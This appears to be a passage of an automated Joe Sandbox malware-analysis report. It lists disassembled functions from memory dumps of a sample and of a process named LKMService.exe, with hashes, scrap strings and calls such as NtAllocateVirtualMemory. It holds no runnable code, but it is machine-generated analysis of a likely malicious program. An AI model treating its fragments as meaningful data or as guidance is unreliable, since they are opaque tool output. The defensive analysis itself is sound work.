Opcode Fuzzy Hash: 07d205acaa95b576073fe9fe72ca00c40a2357b9af236d309039196cb42cb027
Instruction Fuzzy Hash: 86D067752182448FD341CB58E458C207BA4AF4A62471A81E9E948CB2B2DA64EC14DA51

Function 00FECFB0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fadde3145d2930c6a991fc31f49c97a98c094205af05f2f55702de6350c4070
Instruction ID: 9296968168dc781c90d4903bd4a652d90f833b81b725e2d1c3109315a36b6d73
Opcode Fuzzy Hash: 0fadde3145d2930c6a991fc31f49c97a98c094205af05f2f55702de6350c4070
Instruction Fuzzy Hash: 81C002392542048F8344DB58E588C11B7E9EB4C624316C195E90D8B332C631FC00CA44

Non-executed Functions

Function 00FEBE99 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

lD}), xrefs: 00FEBECF

Memory Dump Source

Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Similarity

API ID:
String ID: lD})
API String ID: 0-4278463852
Opcode ID: 34cddbbbe5d129b534d0fa6b0a6bb4446c080eb6a9f1f0131839c9c5482bfc6f
Instruction ID: 23531028a2248e2805bd3ec22af6b5089142183c2734a0b1bffc55dfc43985e5
Opcode Fuzzy Hash: 34cddbbbe5d129b534d0fa6b0a6bb4446c080eb6a9f1f0131839c9c5482bfc6f
Instruction Fuzzy Hash: 6E81B172E002698FDB14DFEAD8806DEBBF2AB88310F16416AE845FB355D7749D019BD0

Function 04DF3290 Relevance: 1.5, Strings: 1, Instructions: 212COMMON

Download Yara Rule

Strings

e#, xrefs: 04DF33F5

Memory Dump Source

Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_file.jbxd

Similarity

API ID:
String ID: e#
API String ID: 0-2910545599
Opcode ID: 9f72abb9feff799299a95a6bc79b6d6971a5091300ff7688614cec2201fa4169
Instruction ID: 6c318ed7b6db91da3e4d7170fe7cffdabaf1fe1caa9b305a809fc831bf111db0
Opcode Fuzzy Hash: 9f72abb9feff799299a95a6bc79b6d6971a5091300ff7688614cec2201fa4169
Instruction Fuzzy Hash: E0911475E14209AFCB54CFAAC88159EFBF1FF88300B15C5AAD925EB214D374AA45CF90

Function 04DF5200 Relevance: 1.4, Strings: 1, Instructions: 193COMMON

Download Yara Rule

Strings

3e*h, xrefs: 04DF53E5

Memory Dump Source

Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_file.jbxd

Similarity

API ID:
String ID: 3e*h
API String ID: 0-2714019034
Opcode ID: 7c7f3ffc4b34c07dfe6c310f8f2aa48bb0b198fe0436f9db494fe67d5a55f880
Instruction ID: 0727f5bc74b97530d6acb329dc12e0ddb59665e18746e05018f2348a62876abc
Opcode Fuzzy Hash: 7c7f3ffc4b34c07dfe6c310f8f2aa48bb0b198fe0436f9db494fe67d5a55f880
Instruction Fuzzy Hash: 82510332B102648FCB28EE6D985156E77F6AFC935075A01BAD909EB392DA74DC02C7D0

Function 04DF3748 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

*0H, xrefs: 04DF38D9

Memory Dump Source

Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_file.jbxd

Similarity

API ID:
String ID: *0H
API String ID: 0-334318661
Opcode ID: 60981a07cc82f93fe18c621a4b2e706036f7b406cbda98acf1960514ca61cad5
Instruction ID: 162bc07ae2e26789c3115749b5e9b20100980270a8a555499ea0a73511c2b019
Opcode Fuzzy Hash: 60981a07cc82f93fe18c621a4b2e706036f7b406cbda98acf1960514ca61cad5
Instruction Fuzzy Hash: CE51E773F106388F8B24DE6D8C4419DB6E2BB8866075B41AADD06FB351DA64DD05CBD0

Function 04DF3758 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

*0H, xrefs: 04DF38D9

Memory Dump Source

Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_file.jbxd

Similarity

API ID:
String ID: *0H
API String ID: 0-334318661
Opcode ID: debbc4b0b8ecf639bf3705226ba8e4de1db8e2d77391402e13cb8853c724d485
Instruction ID: c22b95ec8e1ebc9da6d87ec36ff1f1a0d19d932982f331adf7a129ac71591d5c
Opcode Fuzzy Hash: debbc4b0b8ecf639bf3705226ba8e4de1db8e2d77391402e13cb8853c724d485
Instruction Fuzzy Hash: 7141C673F20A388B8B24DE6D8C4419DB2E3AB8866075B816ADD06FB751DA64DD05C7D0

Function 04DF4750 Relevance: 1.4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

"/3N, xrefs: 04DF4870

Memory Dump Source

Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_file.jbxd

Similarity

API ID:
String ID: "/3N
API String ID: 0-2103554259
Opcode ID: baeee4c4450fdb9001bad7651e3b88d7e6b637a68daabf18d7433876bba8b965
Instruction ID: b924c031b7b8e73636ba3fd6dde53c4461fbc67dc3fc37e0c2308da6d55a6680
Opcode Fuzzy Hash: baeee4c4450fdb9001bad7651e3b88d7e6b637a68daabf18d7433876bba8b965
Instruction Fuzzy Hash: FF41F876F006698FCB18CA5DCC505AEB6B2BF99310B5B416EDD05FB361D6349D008BD0

Function 00FEDFC7 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PV, xrefs: 00FEE03B

Memory Dump Source

Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Similarity

API ID:
String ID: PV
API String ID: 0-2473318681
Opcode ID: 658bd696b96065ea9ab6cb3a366e6a8769c1fc5fb87129801ba3281832a9a89d
Instruction ID: 06b9ec94ba35ffbeb3822b263f6ece94e858011094918d361e7676968573cf72
Opcode Fuzzy Hash: 658bd696b96065ea9ab6cb3a366e6a8769c1fc5fb87129801ba3281832a9a89d
Instruction Fuzzy Hash: E2419575F402598FCB04CFA9D8819DEBBF5BF89320B5A41AAD805F7361D6349D05CBA0

Function 04DF0007 Relevance: .4, Instructions: 401COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d42e153da92d0475fa5fd5e1cae977af4ad516e197818327a981561b94c6e72c
Instruction ID: 4bd227c1a6f0d135f1bf4e628489a96bdb19fa086d8cb46fbff64870b75a2c23
Opcode Fuzzy Hash: d42e153da92d0475fa5fd5e1cae977af4ad516e197818327a981561b94c6e72c
Instruction Fuzzy Hash: 99F19674B053188FDB24CF69CCC8799B7B2BB89300F1581A9D509EB362EA74AD85CF51

Function 04DF55C8 Relevance: .4, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45c5a8734744997775da0c2d7dca91ea8a5f92b38ced98bf3effa00d5065fd08
Instruction ID: 726915936bbedaca26176f29a6071a8e3e2f6720e30b76772bf804c834cbc0f8
Opcode Fuzzy Hash: 45c5a8734744997775da0c2d7dca91ea8a5f92b38ced98bf3effa00d5065fd08
Instruction Fuzzy Hash: C9F1E576E10608AFCF0DCFEAE89559DBBB2BF88310B558129E525EB321DB349811CF40

Function 04DF8B70 Relevance: .3, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea02fda61f575d3802d7053a1ca18754b2a2c085852029a06da4007a000d53ec
Instruction ID: b763eb6a8b0c38825401d325da0f4cb9d2f00aeac41e088396faa14bf290e1a4
Opcode Fuzzy Hash: ea02fda61f575d3802d7053a1ca18754b2a2c085852029a06da4007a000d53ec
Instruction Fuzzy Hash: 9491F973F201254B9B58EA3D8C9057EA2D79FC865070A816BED09FB384DF249C0297D1

Function 04DF4E40 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09ca6cf3c06b42104267b83d2bdb06aa254d77d79607962f1b32d0d0b17cecb3
Instruction ID: ac48236ae591f350373c7bb56624067166a3da7fc107137d0280c56bc3c38f28
Opcode Fuzzy Hash: 09ca6cf3c06b42104267b83d2bdb06aa254d77d79607962f1b32d0d0b17cecb3
Instruction Fuzzy Hash: 1471F432F002259FC714DF6DD85456FBBA6BFC8320B1A856AE919EB351DA70AC41CBD0

Function 04DF85A0 Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2de428b29f7a16efa078832f9b47556db9041b9388482414a25414e87a3f5d78
Instruction ID: edbf44d97fe9db8a441be9c51ce8b869f04d5068a421e5462a2369bddd773362
Opcode Fuzzy Hash: 2de428b29f7a16efa078832f9b47556db9041b9388482414a25414e87a3f5d78
Instruction Fuzzy Hash: 9081A032E002258FCB14EF78C894559B7F2BB9931474A85AAE806EF355EB35EC41CB91

Function 04DF3A00 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4348bd1531d82f317229469cf714d778299a513ef51bed2e8aa30b1d1c2d189c
Instruction ID: ff37c8c94a3b361d1a793a32549311bbcd29c5895ab5bcac58c3d72f00858164
Opcode Fuzzy Hash: 4348bd1531d82f317229469cf714d778299a513ef51bed2e8aa30b1d1c2d189c
Instruction Fuzzy Hash: 1071C773E205388B8B18CFADC88549EF7F6AB9C61071B826ADD15FB350DA349D058BD0

Function 04DF39EF Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ada24cae8e0f1442f0339de53d15e0decfea27772e95a1df2a6995417bde39a1
Instruction ID: ea577998280e727d4fbb000e01674cea949b7e874234204add2ee838ac5ae3a4
Opcode Fuzzy Hash: ada24cae8e0f1442f0339de53d15e0decfea27772e95a1df2a6995417bde39a1
Instruction Fuzzy Hash: 1F61C677F205388F8B14CFA9D85549DB7F6AB9821071B826ADC06FB351DA349D058BD0

Function 00FEA270 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b53c329bd595dcbae60ade3b0c817fec9daeeac38394654442289d42e533d343
Instruction ID: 67e29ea451624eaa988b1210ae9b5991bd7c5ae4d7c2854cb65dbf3c130e13a8
Opcode Fuzzy Hash: b53c329bd595dcbae60ade3b0c817fec9daeeac38394654442289d42e533d343
Instruction Fuzzy Hash: D951D377F115394BDB54DE6D9C402AAB6E36BD821070A82BAE80AFB745E6748C05CBD0

Function 00FEA280 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa8617d60b35ecdeb8e5d09d94ca95726d2249073bdc02dfe2d4b4b86c47baa2
Instruction ID: e812d829d4ea627d39ec04a902dd186f8b26f243a6d50b29d88f2f001ca3743d
Opcode Fuzzy Hash: aa8617d60b35ecdeb8e5d09d94ca95726d2249073bdc02dfe2d4b4b86c47baa2
Instruction Fuzzy Hash: 5D51F373F105394B9B54DE6DDC402AEB2E76BD821070A827AEC0AFB745E6748D05CBD0

Function 04DF6DC8 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 710cfd2acaeec83ced2d02077443c4e3c881950eb5005c804a7620c03d48129e
Instruction ID: c83f0015faf8c8fc3fbc26b76fe597fc2e2c3b0c5eda48f1c6c634a1edadc214
Opcode Fuzzy Hash: 710cfd2acaeec83ced2d02077443c4e3c881950eb5005c804a7620c03d48129e
Instruction Fuzzy Hash: 6E518D76F101258F8B58DE7DC85496EB7E6BF8931075A407DE909EB7A1DA30EC028B90

Function 04DF858F Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a881895278f851363637237ef88b1b58311fe2b62c3039befbf238624b33b366
Instruction ID: ab08b1a0c07765a4a54fa55d83874a256bebba14cb59887852bc913538e90973
Opcode Fuzzy Hash: a881895278f851363637237ef88b1b58311fe2b62c3039befbf238624b33b366
Instruction Fuzzy Hash: 3641D233F00220CF9B68AF399C8845977A6AB8531134A44BAEC45EF356DB35EC01DB91

Function 04DF4538 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d74baac1c2b601c5f7f76b44cdaa226b38e0b66b281e2e21620bc1ef5137910
Instruction ID: 3a756e11fa59acf8b3dd51473d1b7e5ea03e5ac565e58beb04c8a33eb1352101
Opcode Fuzzy Hash: 4d74baac1c2b601c5f7f76b44cdaa226b38e0b66b281e2e21620bc1ef5137910
Instruction Fuzzy Hash: 38412777F101384F9B18DEADCC554AEB6F6ABEC21071A416ADD09FB361DA319C018BD0

Function 04DF2BB8 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61723b4b66c07faed7ffd67a116e10d31fbc20cd4c8ba1b1b1af5ebba4121b6a
Instruction ID: c149091203230ac714f5250205286edbd2c2870bbfc0fd58d201410e387d2c07
Opcode Fuzzy Hash: 61723b4b66c07faed7ffd67a116e10d31fbc20cd4c8ba1b1b1af5ebba4121b6a
Instruction Fuzzy Hash: 48411976E106198BCB04CFA9D8919DEFBF2BF8C210F164169E914FB365D635AC01CBA0

Function 00FEA0A8 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23af5ddec1884985294cfb1bb47bd8c1bf03d85c9e6a6ebe18eab0fe1cbf9aec
Instruction ID: efbd3ab9d0288fa98cef4dd64bb552d8863e5bbe3589a6328fb1114674a2624b
Opcode Fuzzy Hash: 23af5ddec1884985294cfb1bb47bd8c1bf03d85c9e6a6ebe18eab0fe1cbf9aec
Instruction Fuzzy Hash: 70119473F01129479B58DEAE985156BF7E7AFD4350B1AC17AA808EB344DA709D0487D0

Analysis Process: LKMService.exePID: 800, Parent PID: 3560COMMON

Execution Graph

Execution Coverage:	22.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 009E108A Relevance: 12.4, Strings: 4, Instructions: 7421COMMON

Download Yara Rule

Strings

j'R, xrefs: 009E414F
;.%, xrefs: 009E4C97
&03, xrefs: 009E24ED
9!7J, xrefs: 009E741B

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID: j'R$&03$9!7J$;.%
API String ID: 0-3501266285
Opcode ID: c14428951cdeada9695e0cfa6cf12fccd3428d105b8c24b6548bd02899a43fa8
Instruction ID: 02d074a521e83c750a44ed2b9dc41320d000acc5736d0101dbe4f30ae33b5cdb
Opcode Fuzzy Hash: c14428951cdeada9695e0cfa6cf12fccd3428d105b8c24b6548bd02899a43fa8
Instruction Fuzzy Hash: 7EE32A75E112698FDB68DF68C880A9DB3B6FB88300F5145E9D809E7351DB35AE81CF90

Function 009E1098 Relevance: 12.4, Strings: 4, Instructions: 7414COMMON

Download Yara Rule

Strings

j'R, xrefs: 009E414F
;.%, xrefs: 009E4C97
&03, xrefs: 009E24ED
9!7J, xrefs: 009E741B

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID: j'R$&03$9!7J$;.%
API String ID: 0-3501266285
Opcode ID: 1dcf475219467c6637625a1ef06b0a3146215758984faa205b134d55dfb75cf2
Instruction ID: 4f50d7f5cd960a902c5092e35f95080b70d7a872f5d547cf3f210089764c1bc1
Opcode Fuzzy Hash: 1dcf475219467c6637625a1ef06b0a3146215758984faa205b134d55dfb75cf2
Instruction Fuzzy Hash: F0E32A75E112298FDB68DF68C880A9DB3B6FB88300F5145E9D849E7351DB35AE81CF90

Function 009EC3D8 Relevance: 2.9, Strings: 2, Instructions: 448
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

t~t, xrefs: 009EC97A
i, xrefs: 009EC4D6

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID: i$t~t
API String ID: 0-3363634073
Opcode ID: a0686ef9156caebd70da48e899d1fee59c9683f7e4efc3781a6e68adcd7baa9d
Instruction ID: 821920138083445be819bbe8d5fad8904f25f53efd9f6b2003044e20766fa9f9
Opcode Fuzzy Hash: a0686ef9156caebd70da48e899d1fee59c9683f7e4efc3781a6e68adcd7baa9d
Instruction Fuzzy Hash: C0E11475B001658FCB1ADB69C85457E77E2BF89300B154869E986EB3A2DF389C02C7D1

Function 009EB7B8 Relevance: 2.9, Strings: 2, Instructions: 391
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

t~t, xrefs: 009EBC92
9x=], xrefs: 009EB942

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID: 9x=]$t~t
API String ID: 0-3258716098
Opcode ID: e957b449221b29ea57cb9593d5dd7b5ef987d530472d0b671408d705ddcb9b6b
Instruction ID: 7f21fbee4eb47e830159303224c55d655a004c748d401be81d6b29309298060b
Opcode Fuzzy Hash: e957b449221b29ea57cb9593d5dd7b5ef987d530472d0b671408d705ddcb9b6b
Instruction Fuzzy Hash: CED1BF39B101208F8759EB7DC89892E73E6AF8D71031684B9E90ADB361DF78DC01CB91

Function 009E9198 Relevance: 1.8, Strings: 1, Instructions: 503
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1O^, xrefs: 009E9443

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID: 1O^
API String ID: 0-971112054
Opcode ID: 7e52b8f4767c843d910f9971bbcad7fbe287543326dae7ada99f827488e0b481
Instruction ID: 5eb29704131d3882e007a0fcef1124be3aaf0484e8a8ec6a61fd8e5508883173
Opcode Fuzzy Hash: 7e52b8f4767c843d910f9971bbcad7fbe287543326dae7ada99f827488e0b481
Instruction Fuzzy Hash: 15127A75E002599FCB15DFAAD89069DB7B2BF88310F14C16AE825E7351EB389D45CF80

Function 049B5D49 Relevance: 1.6, APIs: 1, Instructions: 65
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 049B5DD9

Memory Dump Source

Source File: 00000002.00000002.4673956517.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_49b0000_LKMService.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 3ae464bd4a0ff7755360cffb076df1c5d55fbeaf33f3be0049ae872eaf828dfa
Instruction ID: 5626b25661a5f20d9ca6dea83e9d484ab7a21070a0e0cb5dd04258c75ed676ca
Opcode Fuzzy Hash: 3ae464bd4a0ff7755360cffb076df1c5d55fbeaf33f3be0049ae872eaf828dfa
Instruction Fuzzy Hash: 332146B1D003499FDB10CFAAD984ADEFBF0FF48310F208429E519A7250C7759900CBA0

Function 049B5D50 Relevance: 1.6, APIs: 1, Instructions: 63
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 049B5DD9

Memory Dump Source

Source File: 00000002.00000002.4673956517.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_49b0000_LKMService.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 22b9b7186cf77ef8e3a4cc867243c89c2dbe6040cba2a0a03b8661d4653cccc6
Instruction ID: c3506ecbd02c800b6d2756277a2ca60dc9fa3c489bce628da4396f228f851e11
Opcode Fuzzy Hash: 22b9b7186cf77ef8e3a4cc867243c89c2dbe6040cba2a0a03b8661d4653cccc6
Instruction Fuzzy Hash: E32125B1D003499FDB10CFAAD980ADEFBF4FF48310F20842AE519A3200C775A910CBA1

Function 049B6230 Relevance: 1.6, APIs: 1, Instructions: 61
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 049B62B3

Memory Dump Source

Source File: 00000002.00000002.4673956517.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_49b0000_LKMService.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 0a5358531f1deef87d7dea1d32d2136f12ef8277c225ba62bdb64a396d8e6cbf
Instruction ID: ba4d98004ab9bf26f81db14de029a48f252082007950f25b7f125e1b04229c5c
Opcode Fuzzy Hash: 0a5358531f1deef87d7dea1d32d2136f12ef8277c225ba62bdb64a396d8e6cbf
Instruction Fuzzy Hash: 242114B19003099FDB10DFAAC881ADEFBF5FF48310F10842AE519A7210C775A950CBA5

Function 009E9187 Relevance: 1.5, Strings: 1, Instructions: 250
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1O^, xrefs: 009E9443

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID: 1O^
API String ID: 0-971112054
Opcode ID: 1472ac6dd0369d64a0750b7e03b30cef0c0de85b8057b841d22b0d8df0fcd3bd
Instruction ID: 32e41410d66740aaec77ca85bc067af8d24613ba201984d2e914cb7e3114a208
Opcode Fuzzy Hash: 1472ac6dd0369d64a0750b7e03b30cef0c0de85b8057b841d22b0d8df0fcd3bd
Instruction Fuzzy Hash: 55B10775E00209AFCB55DFAAD450AADB7F6FF99300B14C1AAD425EB355EB389A05CF00

Function 009EC1A9 Relevance: 1.4, Strings: 1, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

3G., xrefs: 009EC1DA

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID: 3G.
API String ID: 0-3978388015
Opcode ID: 5b8ebd5f6db857f5aeed1fbddbf6236ea032859d06fa6f3081c9b7d54b2eeede
Instruction ID: 352b58406a8a96178fa6da2120b9ef91cf4131edf89a879e173c4fc2695e58a0
Opcode Fuzzy Hash: 5b8ebd5f6db857f5aeed1fbddbf6236ea032859d06fa6f3081c9b7d54b2eeede
Instruction Fuzzy Hash: 7D51D373E102648FCB19DFA9C49459D77A6AF9931175640BAEC06FB362DA35CC41CBC0

Function 009EC1B8 Relevance: 1.4, Strings: 1, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

3G., xrefs: 009EC1DA

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID: 3G.
API String ID: 0-3978388015
Opcode ID: 1f9fee0b3d46c1a4e2c6a96caa9748d823deb2d3f91eeee9d30f49e74e9a6485
Instruction ID: 89899d221ac13e6f8723f067d2a86fe84244207b7f980a96afdf4f08c749cdb5
Opcode Fuzzy Hash: 1f9fee0b3d46c1a4e2c6a96caa9748d823deb2d3f91eeee9d30f49e74e9a6485
Instruction Fuzzy Hash: 0D51C177F101248FCB18DFA9C4945AEB6A6AF98351B5641A9EC06FB361DB35CC41CBC0

Function 009E9A30 Relevance: .5, Instructions: 503COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 265db05a0e6d5f9495aa1b932ec6de3802897f0668e9a2ff6ed522a186d9308b
Instruction ID: 50d7b104786b84c970d65803dff6d9267f88ec7750f09a9d8bcd28104967765b
Opcode Fuzzy Hash: 265db05a0e6d5f9495aa1b932ec6de3802897f0668e9a2ff6ed522a186d9308b
